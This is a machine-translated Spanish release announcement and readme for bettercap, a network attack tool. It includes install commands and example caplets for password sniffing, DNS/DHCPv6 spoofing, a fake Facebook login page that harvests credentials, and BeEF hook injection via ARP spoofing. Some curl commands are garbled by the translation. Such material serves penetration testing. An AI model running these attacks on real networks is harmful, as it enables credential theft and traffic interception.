Lanzamiento de bettercap v2.24.1: navaja suiza para ataques de red y monitoreo

bettercap es la navaja suiza para ataques de red y monitoreo.

Bettercap v2.24.1 lanzado.

Registro de cambios

Arreglos

• configurando correctamente el  RemoteAddr campo de una solicitud de proxy
• Se ha corregido una falta de referencia de puntero nulo en el capturador de banner http de syn.scan
• Los  http.proxy módulos no pudieron manejar adecuadamente las solicitudes con el número de puerto en la URL.

Descargar

Estibador

En este repositorio, BetterCAP está en contenedores utilizando  Alpine Linux - una distribución de Linuxligera y orientada a la seguridad basada en musl libc y busybox. La imagen Docker resultante es relativamente pequeña y fácil de administrar las dependencias.

Para sacar la última versión de BetterCAP de la imagen:

$ docker pull evilsocket / bettercap-ng

Correr:

$ docker run -it --privileged --net = host evilsocket / bettercap-ng -h

Compilando

Asegúrese de tener un entorno Go> = 1.8 configurado correctamente, que $ GOPATH / bin está en $ PATH y el paquete libpcap-dev instalado en su sistema, luego:

$ go get github.com/evilsocket/bettercap-ng

Para mostrar las opciones de la línea de comando:

$ sudo bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
  -no-history
        Disable history file.
  -silent
        Suppress all logs which are not errors.

Cápsulas

Las sesiones interactivas pueden tener secuencias de comandos con  archivos .cap  , o  comprimidos , los siguientes son algunos ejemplos básicos, busque más en la  carpeta de comprimidos  .

caplets / simple-password-sniffer.cap

Simple contraseña sniffer.

# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniff.regexp .*password=.+
# set the sniffer output file
set net.sniff.output passwords.pcap
# start the sniffer
net.sniff on

comprimidos / mitm6.cap

Redireccione las solicitudes de DNS mediante el uso de respuestas DHCPv6, inicie un servidor HTTP y un spoofer de DNS para microsoft.com y google.com.

# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# check who's alive on the network
net.recon on
# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear

 caplets / rest-api.cap

Iniciar una API de descanso.

# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on
net.recon on

# enjoy /api/session and /api/events
api.rest on 

Obtener información sobre la sesión actual:

curl -k –user bpcap: bcap https: // bettercap-ip: 8083 / api / session

Ejecutar un comando en la sesión interactiva actual:

curl -k –user bcap: bcap https: // bettercap-ip: 8083 / api / session -H “Tipo de contenido: application / json” -X POST -d '{“cmd”: "net.probe on”} '

Recibe los últimos 50 eventos:

curl -k –user bpcap: bcap https: // bettercap-ip: 8083 / api / events? n = 50

Eventos claros:

curl -k –user bpcap: bcap -X BORRAR https: // bettercap-ip: 8083 / api / events

caplets / fb -phish.cap

Este comprimido creará una página de inicio de sesión de Facebook falsa en el puerto 80, interceptará los intentos de inicio de sesión usando  http.proxy , imprimirá las credenciales y redirigirá el objetivo al Facebook real.

Asegúrese de crear la carpeta primero:

$ cd caplets/www/
$ make
set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on 

El   archivo de script de proxy caplets / fb-phish.js :

caplets / beef-inject.cap

Use un script de proxy para inyectar un gancho de JavaScript BEEF:

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

El   archivo de script de proxy caplets / beef.inject.js :

Modo interactivo

El modo interactivo le permite iniciar y detener módulos manualmente sobre la marcha, cambiar las opciones y aplicar nuevas reglas de firewall sobre la marcha. Para mostrar el tipo de menú de ayuda, puede obtener ayuda específica del módulo utilizando el  nombre del módulo de ayuda .

Tutorial

Copyright (C) 2018 Simone Margaritelli

Fuente:  https://github.com/evilsocket/